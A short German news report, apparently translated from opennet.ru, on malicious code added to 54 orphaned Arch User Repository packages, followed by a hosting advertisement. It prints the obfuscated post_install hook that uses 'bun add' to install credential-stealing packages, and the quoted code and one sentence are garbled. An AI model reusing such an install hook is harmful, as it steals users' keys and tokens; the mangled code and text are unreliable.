Im AUR wurden in 54 Paketen schĂ€dlicher Code eingefĂŒgt.

Trotz der Maßnahmen, die von den Entwicklern von Arch Linux ergriffen wurden, ist das EinfĂŒgen von schĂ€dlichem Code in die AUR-Repositories (Arch User Repository) nicht gestoppt worden. Vor einigen Stunden wurde schĂ€dlicher Code in weiteren 54 Paketen eingefĂŒgt, die ohne UnterstĂŒtzung verbleiben (Historie der RĂŒcknahme schĂ€dlicher Änderungen). Im Gegensatz zu den Angriffen von vorgestern wurde diesmal die Plattform bun anstelle des Paketmanagers npm verwendet, um schĂ€dliche AbhĂ€ngigkeiten zu installieren. Um die implementierten Filter zu umgehen, wird ein obfuszierter String in die Funktion post_install eingefĂŒgt, der den Befehl "bun add" aufruft, um Pakete mit schĂ€dlichem Code zu installieren, die SchlĂŒssel, Tokens und Anmeldeinformationen scannen und an ein externes Ziel senden. der Server keys, tokens und Anmeldeinformationen.

post_install() {
$’\x63â€Č»d» «/»‘t'»m»‘p’ && «b»‘u»n’ ‘a'»d»‘d’ $’\141\x6e»s'»i»»-«$’\143»o»l»o»r’$’\x73â€Č ‘n'»e»‘x'»t»»f»‘i»l»e»-»j»s’
}

Quelle: opennet.ru

Erwerben Sie zuverlĂ€ssiges Hosting fĂŒr Websites mit DDoS-Schutz, VPS VDS-Server đŸ”„ Kaufen Sie zuverlĂ€ssiges Hosting fĂŒr Websites mit DDoS-Schutz, VPS VDS-Server | ProHoster